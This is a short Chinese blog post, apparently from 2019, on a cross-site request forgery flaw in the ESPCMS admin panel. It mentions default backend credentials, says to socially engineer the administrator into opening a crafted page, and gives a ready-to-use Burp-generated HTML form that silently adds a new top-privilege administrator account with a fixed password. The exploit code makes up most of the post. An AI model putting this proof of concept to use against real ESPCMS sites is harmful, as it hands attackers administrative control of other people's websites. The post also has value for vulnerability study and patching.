ESPCMS的CSRF添加管理员账号

前言

这里开始的思路是先注入进去然后getshell 但是不关CSRF什么事

换思路看了一下群消息大哥发了一个视频后台名称admin admin123

0X01 CSRF攻击之旅

进后台添加管理这里为了试验环境需要把你加的管理先删除了

然后POST抓包添加用户的这里构造CSRF

然后社工管理员

管理点击后

成功

exp

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://www.espcms.com/adminsoft/index.php?archive=management&action=managesava" method="POST">
      <input type="hidden" name="inputclass" value="add" />
      <input type="hidden" name="tab" value="true" />
      <input type="hidden" name="username" value="zhong" />
      <input type="hidden" name="password" value="zhongzhong" />
      <input type="hidden" name="password2" value="zhongzhong" />
      <input type="hidden" name="name" value="zhong" />
      <input type="hidden" name="sex" value="1" />
      <input type="hidden" name="powergroup" value="1" />
      <input type="hidden" name="inputclassid" value="1" />
      <input type="hidden" name="isremote" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

posted @ 2019-06-20 22:42 yourse1f 阅读(678) 评论(1) 编辑收藏举报

刷新页面返回顶部

Welcome Q's Blog

ESPCMS的CSRF添加管理员账号

ESPCMS的CSRF添加管理员账号

公告